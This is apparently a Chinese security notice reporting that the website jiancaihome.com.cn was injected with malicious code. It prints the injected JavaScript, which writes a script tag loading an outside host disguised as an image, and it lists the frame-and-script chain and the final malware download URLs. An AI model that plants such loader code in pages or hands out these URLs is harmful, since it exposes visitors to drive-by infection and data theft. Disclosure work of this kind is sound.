建材之家被植入恶意代码
建材之家(http://www.jiancaihome.com.cn/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。
MalUrl:http://www.jiancaihome.com.cn/js/2.js
网页被嵌入恶意链接代码:
document.writeln(”<script language =javascript>if(document.cookie.indexOf(/’hello/’)==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie=/’hello=Yes;path=//;expires=/’+expires.toGMTString();document.write(unescape(/”%3Cscript%20src%3Dhttp%3A////www.paisf.net//Game//ads.jpg%3E%3C//script%3E/”));}<//script>”)
挂马分析:
[wide]http://www.jiancaihome.com.cn/
[script]http://www.jiancaihome.com.cn/1.js
[script]http://www.jiancaihome.com.cn//js/2.js
[script]http://www.paisf.net/game/ads.jpg
[frame]http://xeioa.cn:338/b117173/b11.htm
[frame]http://xeioa.cn:338/b117173/new.html
[script]http://xeioa.cn:338/b117173/../xnnn.js
[script]http://xeioa.cn:338/b117173/../zhin.js
[frame]http://xeioa.cn:338/b117173/../../lzz.htm
[frame]http://xeioa.cn:338/b117173/../../as.htm
[frame]http://xeioa.cn:338/b117173/../../bfyy.htm
[frame]http://xeioa.cn:338/b117173/../14.htm
[frame]http://xeioa.cn:338/b117173/fx.htm
[frame]http://xeioa.cn:338/b117173/../active.htm
[frame]http://xeioa.cn:338/b117173/../cx.htm
[frame]http://xeioa.cn:338/b117173/../real10.htm
[frame]http://xeioa.cn:338/b117173/../real11.htm
[script]http://xeioa.cn:338/b117173/../wewew.js
[script]http://count7.51much.com/cnt.php?uid=ua-1-13197&style=text&text=网站统计
最终下载病毒文件:
http://j1s2.cn:2222/neww/lzz.css
http://j1s2.cn:2222/neww/as.css
http://j1s2.cn:2222/neww/bf.css
http://j1s2.cn:2222/neww/ms.css
http://j1s2.cn:2222/neww/adr.css
http://j1s2.cn:2222/neww/re.css
http://j1s2.cn:2222/neww/real11.css
http://j1s2.cn:2222/Baidu.cab
通过执行以上病毒文件,来达到完全控制访问者的系统。
关键字:恶意代码
